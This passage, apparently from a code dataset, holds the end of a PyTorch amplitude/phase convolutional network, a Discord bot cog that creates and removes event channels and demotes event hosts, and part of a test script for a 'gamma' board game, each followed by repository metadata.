add=1 - pi,
)
)
self.conv5_amp = nn.Sequential(
*conv_amp(
ni=4,
nc=8,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 1),
dilation=1,
)
)
self.conv5_phase = nn.Sequential(
*conv_phase(
ni=4,
nc=8,
ks=(round_odd(0.0793 * img_size), round_odd(0.0793 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0793 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv6_amp = nn.Sequential(
*conv_amp(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
)
)
self.conv6_phase = nn.Sequential(
*conv_phase(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
add=1 - pi,
)
)
self.conv7_amp = nn.Sequential(
*conv_amp(
ni=12,
nc=16,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv7_phase = nn.Sequential(
*conv_phase(
ni=12,
nc=16,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv_con2_amp = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con2_phase = nn.Sequential(
LocallyConnected2d(16, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
# ################################## Phase 3
self.conv8_amp = nn.Sequential(
*conv_amp(
ni=1,
nc=4,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv8_phase = nn.Sequential(
*conv_phase(
ni=1,
nc=4,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv9_amp = nn.Sequential(
*conv_amp(
ni=4,
nc=8,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv9_phase = nn.Sequential(
*conv_phase(
ni=4,
nc=8,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv10_amp = nn.Sequential(
*conv_amp(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
)
)
self.conv10_phase = nn.Sequential(
*conv_phase(
ni=8,
nc=12,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 2),
dilation=2,
add=1 - pi,
)
)
self.conv11_amp = nn.Sequential(
*conv_amp(
ni=12,
nc=20,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
)
)
self.conv11_phase = nn.Sequential(
*conv_phase(
ni=12,
nc=20,
ks=(round_odd(0.0476 * img_size), round_odd(0.0476 * img_size)),
stride=1,
padding=make_padding(round_odd(0.0476 * img_size), 1, 1),
dilation=1,
add=1 - pi,
)
)
self.conv_con3_amp = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
nn.ReLU(),
)
self.conv_con3_phase = nn.Sequential(
LocallyConnected2d(20, 1, img_size, 1, stride=1, bias=False),
nn.BatchNorm2d(1),
GeneralELU(1 - pi),
)
self.symmetry_real = Lambda(symmetry)
self.symmetry_imag = Lambda(partial(symmetry, mode="imag"))
def forward(self, x):
inp = x.clone()
amp = x[:, 0, :].unsqueeze(1)
phase = x[:, 1, :].unsqueeze(1)
# First block
amp = self.conv1_amp(amp)
phase = self.conv1_phase(phase)
amp = self.conv2_amp(amp)
phase = self.conv2_phase(phase)
amp = self.conv3_amp(amp)
phase = self.conv3_phase(phase)
amp = self.conv_con1_amp(amp)
phase = self.conv_con1_phase(phase)
# Second block
amp = self.conv4_amp(amp)
phase = self.conv4_phase(phase)
amp = self.conv5_amp(amp)
phase = self.conv5_phase(phase)
amp = self.conv6_amp(amp)
phase = self.conv6_phase(phase)
amp = self.conv7_amp(amp)
phase = self.conv7_phase(phase)
amp = self.conv_con2_amp(amp)
phase = self.conv_con2_phase(phase)
# Third block
amp = self.conv8_amp(amp)
phase = self.conv8_phase(phase)
amp = self.conv9_amp(amp)
phase = self.conv9_phase(phase)
amp = self.conv10_amp(amp)
phase = self.conv10_phase(phase)
amp = self.conv11_amp(amp)
phase = self.conv11_phase(phase)
amp = self.conv_con3_amp(amp)
phase = self.conv_con3_phase(phase)
# amp = amp + inp[:, 0].unsqueeze(1)
inp_amp = inp[:, 0].unsqueeze(1)
inp_phase = inp[:, 1].unsqueeze(1)
# phase = phase + inp[:, 1].unsqueeze(1)
x0 = self.symmetry_real(amp).reshape(-1, 1, amp.shape[2], amp.shape[2])
x0[inp_amp != 0] = inp_amp[inp_amp != 0]
x1 = self.symmetry_imag(phase).reshape(-1, 1, phase.shape[2], phase.shape[2])
x1[inp_phase != 0] = inp_phase[inp_phase != 0]
comb = torch.cat([x0, x1], dim=1)
return comb
| 33.211094
| 88
| 0.499165
| 2,796
| 21,554
| 3.66166
| 0.036123
| 0.060168
| 0.058019
| 0.045712
| 0.966302
| 0.924106
| 0.911702
| 0.895683
| 0.869799
| 0.864915
| 0
| 0.096407
| 0.36332
| 21,554
| 648
| 89
| 33.262346
| 0.649639
| 0.02162
| 0
| 0.761468
| 0
| 0
| 0.000572
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014679
| false
| 0
| 0.011009
| 0
| 0.040367
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02b61172c00f8b2ce837e1a981fde072c1ea7473
| 27,017
|
py
|
Python
|
cogs/eventmanagement.py
|
costaluu/sloth-bot
|
48727aff5859ec96c48691a638b3b8c0a90c70f9
|
[
"MIT"
] | null | null | null |
cogs/eventmanagement.py
|
costaluu/sloth-bot
|
48727aff5859ec96c48691a638b3b8c0a90c70f9
|
[
"MIT"
] | null | null | null |
cogs/eventmanagement.py
|
costaluu/sloth-bot
|
48727aff5859ec96c48691a638b3b8c0a90c70f9
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from extra.menu import ConfirmSkill
from extra import utils
import os
from typing import Dict, Any
from extra.smartroom.event_rooms import EventRoomsTable
mod_role_id = int(os.getenv('MOD_ROLE_ID', 123))
senior_mod_role_id = int(os.getenv('SENIOR_MOD_ROLE_ID', 123))
admin_role_id = int(os.getenv('ADMIN_ROLE_ID', 123))
owner_role_id = int(os.getenv('OWNER_ROLE_ID', 123))
event_manager_role_id = int(os.getenv('EVENT_MANAGER_ROLE_ID', 123))
real_event_manager_role_id = int(os.getenv('REAL_EVENT_MANAGER_ROLE_ID', 123))
preference_role_id = int(os.getenv('PREFERENCE_ROLE_ID', 123))
class EventManagement(EventRoomsTable):
""" A category for event related commands. """
def __init__(self, client) -> None:
""" Class initializing method. """
self.client = client
@commands.Cog.listener()
async def on_ready(self) -> None:
""" Tells when the cog is ready to use. """
print("EventManagement cog is online!")
async def get_event_permissions(self, guild: discord.Guild) -> Dict[Any, Any]:
""" Gets permissions for event rooms. """
# Get some roles
event_manager_role = discord.utils.get(guild.roles, id=event_manager_role_id)
preference_role = discord.utils.get(guild.roles, id=preference_role_id)
mod_role = discord.utils.get(guild.roles, id=mod_role_id)
overwrites = {}
overwrites[guild.default_role] = discord.PermissionOverwrite(
read_messages=False, send_messages=False, connect=False,
speak=False, view_channel=False)
overwrites[preference_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=False, connect=False, view_channel=True)
overwrites[event_manager_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True, manage_messages=True,
mute_members=True, embed_links=True, connect=True,
speak=True, move_members=True, view_channel=True,
manage_permissions=True)
overwrites[mod_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True, manage_messages=True,
mute_members=True, embed_links=True, connect=True,
speak=True, move_members=True, view_channel=True)
return overwrites
# CREATE EVENT
@commands.group()
async def create_event(self, ctx) -> None:
""" Creates an event. """
if ctx.invoked_subcommand:
return
cmd = self.client.get_command('create_event')
prefix = self.client.command_prefix
subcommands = [f"{prefix}{c.qualified_name}" for c in cmd.commands]
subcommands = '\n'.join(subcommands)
embed = discord.Embed(
title="Subcommads",
description=f"```apache\n{subcommands}```",
color=ctx.author.color,
timestamp=ctx.message.created_at
)
await ctx.send(embed=embed)
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def movie(self, ctx) -> None:
""" Creates a Movie Night voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Movie Night`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
cinema_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('CINEMA_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Cinema Club role
overwrites[cinema_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎥 Movie Night 🎥",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎥 Movie Night 🎥",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def karaoke(self, ctx) -> None:
""" Creates a Karaoke Night voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Karaoke Night`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
karaoke_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('KARAOKE_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Karaoke Club role
overwrites[karaoke_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎤 Karaoke Night 🎤",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎤 Karaoke Night 🎤",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def culture(self, ctx) -> None:
""" Creates a Culture Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Culture Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
culture_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('CULTURE_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Culture Club role
overwrites[culture_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎏 Culture Event 🎏",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎏 Culture Event 🎏",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def art(self, ctx) -> None:
""" Creates a Art Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Art Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
art_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('ART_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Culture Club role
overwrites[art_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎏 Art Event 🎏",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎏 Art Event 🎏",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def wellness(self, ctx) -> None:
""" Creates a Wellness Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Wellness Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
wellness_role = discord.utils.get(
guild.roles, id=int(os.getenv('WELLNESS_ROLE_ID', 123))
)
# Adds some perms to the Culture Club role
overwrites[wellness_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🌺 Wellness Event 🌺",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🌺 Wellness Event 🌺",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def science(self, ctx) -> None:
""" Creates a Science Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Science Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
science_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('SCIENCE_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Culture Club role
overwrites[science_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🦠 Science Event 🦠",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🦠 Science Event 🦠",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def reading(self, ctx) -> None:
""" Creates a Reading Session voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Reading Session`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
culture_club_role = discord.utils.get(
guild.roles, id=int(os.getenv('READING_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Culture Club role
overwrites[culture_club_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎏 Reading Session 📖",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎏 Reading Session 📖",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def gaming(self, ctx) -> None:
""" Creates a Gaming Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Gaming Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
gamer_role = discord.utils.get(
guild.roles, id=int(os.getenv('GAMER_ROLE_ID', 123))
)
# Adds some perms to the Karaoke Club role
overwrites[gamer_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🎮 Gaming Event 🎮",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🎮 Gaming Event 🎮",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@create_event.command()
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
@commands.cooldown(1, 60, commands.BucketType.user)
async def sport(self, ctx) -> None:
""" Creates a Sport Event voice and text channel. """
member = ctx.author
guild = ctx.guild
room = await self.get_event_room_by_user_id(member.id)
channel = discord.utils.get(guild.text_channels, id=room[2]) if room else None
if room and channel:
return await ctx.send(f"**{member.mention}, you already have an event room going on! ({channel.mention})**")
elif room and not channel:
await self.delete_event_room_by_txt_id(room[2])
confirm = await ConfirmSkill("Do you want to create a `Sport Event`?").prompt(ctx)
if not confirm:
return await ctx.send("**Not creating it then!**")
overwrites = await self.get_event_permissions(guild)
gamer_role = discord.utils.get(
guild.roles, id=int(os.getenv('SPORT_CLUB_ROLE_ID', 123))
)
# Adds some perms to the Karaoke Club role
overwrites[gamer_role] = discord.PermissionOverwrite(
read_messages=True, send_messages=True,
connect=True, speak=True, view_channel=True)
events_category = discord.utils.get(
guild.categories, id=int(os.getenv('EVENTS_CAT_ID', 123)))
try:
# Creating text channel
text_channel = await events_category.create_text_channel(
name=f"🏃 Sport Event 🏃",
overwrites=overwrites)
# Creating voice channel
voice_channel = await events_category.create_voice_channel(
name=f"🏃 Sport Event 🏃",
user_limit=None,
overwrites=overwrites)
# Inserts it into the database
await self.insert_event_room(
user_id=member.id, vc_id=voice_channel.id, txt_id=text_channel.id)
except Exception as e:
print(e)
await ctx.send(f"**{member.mention}, something went wrong, try again later!**")
else:
await ctx.send(f"**{member.mention}, {text_channel.mention} is up and running!**")
@commands.command(aliases=['close_event'])
@commands.has_any_role(*[event_manager_role_id, mod_role_id, admin_role_id, owner_role_id])
async def delete_event(self, ctx) -> None:
""" Deletes an event room. """
member = ctx.author
perms = ctx.channel.permissions_for(member)
delete = False
if not (room := await self.get_event_room_by_txt_id(ctx.channel.id)):
return await ctx.send(f"**{member.mention}, this is not an event room, write this command in the event channel you created!**")
# Checks whether member can delete room
if room[0] == member.id: # If it's the owner of the room
delete = True
elif perms.administrator or mod_role_id in [r.id for r in member.roles]: # If it's a staff member
delete = True
if delete:
confirm = await ConfirmSkill(f"**{member.mention}, are you sure you want to delete the event rooms?**").prompt(ctx)
if confirm:
try:
await self.delete_event_room_by_txt_id(ctx.channel.id)
if (room_one := self.client.get_channel(room[1])):
await room_one.delete()
if (room_two := self.client.get_channel(room[2])):
await room_two.delete()
except Exception as e:
print(e)
await ctx.send(f"**Something went wrong with it, try again later, {member.mention}!**")
else:
await ctx.send(f"**Not deleting them, then, {member.mention}!**")
@commands.command(aliases=['dh'])
@utils.is_allowed([owner_role_id, admin_role_id, real_event_manager_role_id], throw_exc=True)
async def demote_host(self, ctx, member: discord.Member = None) -> None:
""" Demotes a teacher to a regular user.
:param member: The teacher that is gonna be demoted. """
if not member:
return await ctx.send("**Please, inform a member to demote to a regular user!**")
author: discord.Member = ctx.author
event_host = discord.utils.get(ctx.guild.roles, id=event_manager_role_id)
if event_host not in member.roles:
return await ctx.send(f"**{member.mention} is not even an Event Host!**")
try:
await member.remove_roles(event_host)
except:
pass
# General log
demote_embed = discord.Embed(
title="__Event Host Demotion__",
description=f"{member.mention} has been demoted from an `Event Host` to `regular user` by {author.mention}",
color=discord.Color.dark_red(),
timestamp=ctx.message.created_at
)
await ctx.send(embed=demote_embed)
# Moderation log
if demote_log := discord.utils.get(ctx.guild.text_channels, id=int(os.getenv('PROMOTE_DEMOTE_LOG_ID', 123))):
demote_embed.set_author(name=member, icon_url=member.display_avatar)
demote_embed.set_footer(text=f"Demoted by {author}", icon_url=author.display_avatar)
await demote_log.send(embed=demote_embed)
try:
await member.send(f"**You have been demoted from an `Event Host` to a regular user!**")
except:
pass
def setup(client) -> None:
""" Cog's setup function. """
client.add_cog(EventManagement(client))
| 42.280125
| 139
| 0.628863
| 3,488
| 27,017
| 4.695241
| 0.069954
| 0.026012
| 0.031508
| 0.024608
| 0.820785
| 0.789949
| 0.787507
| 0.754228
| 0.746352
| 0.738963
| 0
| 0.006385
| 0.269571
| 27,017
| 638
| 140
| 42.346395
| 0.821678
| 0.047044
| 0
| 0.703463
| 0
| 0.004329
| 0.154096
| 0.020359
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004329
| false
| 0.004329
| 0.015152
| 0
| 0.071429
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b89a69279beb1e36b11ce465d01b093a1f3b8966
| 8,776
|
py
|
Python
|
z2/part2/interactive/jm/random_normal_1/534113920.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 1
|
2020-04-16T12:13:47.000Z
|
2020-04-16T12:13:47.000Z
|
z2/part2/interactive/jm/random_normal_1/534113920.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:50:15.000Z
|
2020-05-19T14:58:30.000Z
|
z2/part2/interactive/jm/random_normal_1/534113920.py
|
kozakusek/ipp-2020-testy
|
09aa008fa53d159672cc7cbf969a6b237e15a7b8
|
[
"MIT"
] | 18
|
2020-03-06T17:45:13.000Z
|
2020-06-09T19:18:31.000Z
|
from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 534113920
"""
"""
random actions, total chaos
"""
board = gamma_new(8, 7, 5, 8)
assert board is not None
assert gamma_move(board, 1, 1, 4) == 1
assert gamma_move(board, 1, 7, 1) == 1
assert gamma_move(board, 2, 0, 6) == 1
assert gamma_busy_fields(board, 2) == 1
assert gamma_move(board, 3, 0, 4) == 1
assert gamma_move(board, 4, 1, 0) == 1
assert gamma_move(board, 4, 4, 6) == 1
assert gamma_free_fields(board, 4) == 50
assert gamma_move(board, 5, 5, 6) == 1
assert gamma_move(board, 5, 7, 0) == 1
assert gamma_move(board, 1, 7, 3) == 1
assert gamma_move(board, 1, 0, 1) == 1
assert gamma_golden_possible(board, 1) == 1
assert gamma_move(board, 2, 0, 4) == 0
assert gamma_move(board, 3, 5, 5) == 1
assert gamma_move(board, 3, 3, 4) == 1
assert gamma_free_fields(board, 3) == 44
assert gamma_move(board, 4, 5, 4) == 1
assert gamma_move(board, 5, 6, 1) == 1
assert gamma_move(board, 5, 1, 5) == 1
assert gamma_move(board, 1, 5, 6) == 0
assert gamma_move(board, 1, 6, 5) == 1
assert gamma_free_fields(board, 1) == 40
assert gamma_move(board, 2, 6, 0) == 1
board730595885 = gamma_board(board)
assert board730595885 is not None
assert board730595885 == ("2...45..\n"
".5...31.\n"
"31.3.4..\n"
".......1\n"
"........\n"
"1.....51\n"
".4....25\n")
del board730595885
board730595885 = None
assert gamma_move(board, 3, 1, 5) == 0
assert gamma_move(board, 3, 6, 1) == 0
assert gamma_move(board, 4, 4, 7) == 0
assert gamma_move(board, 5, 0, 2) == 1
assert gamma_move(board, 5, 4, 2) == 1
assert gamma_free_fields(board, 5) == 37
assert gamma_move(board, 1, 1, 2) == 1
assert gamma_busy_fields(board, 1) == 6
assert gamma_free_fields(board, 1) == 36
assert gamma_move(board, 2, 1, 5) == 0
assert gamma_move(board, 2, 4, 0) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 3, 2, 5) == 1
assert gamma_move(board, 3, 3, 5) == 1
assert gamma_move(board, 4, 1, 3) == 1
assert gamma_golden_possible(board, 4) == 1
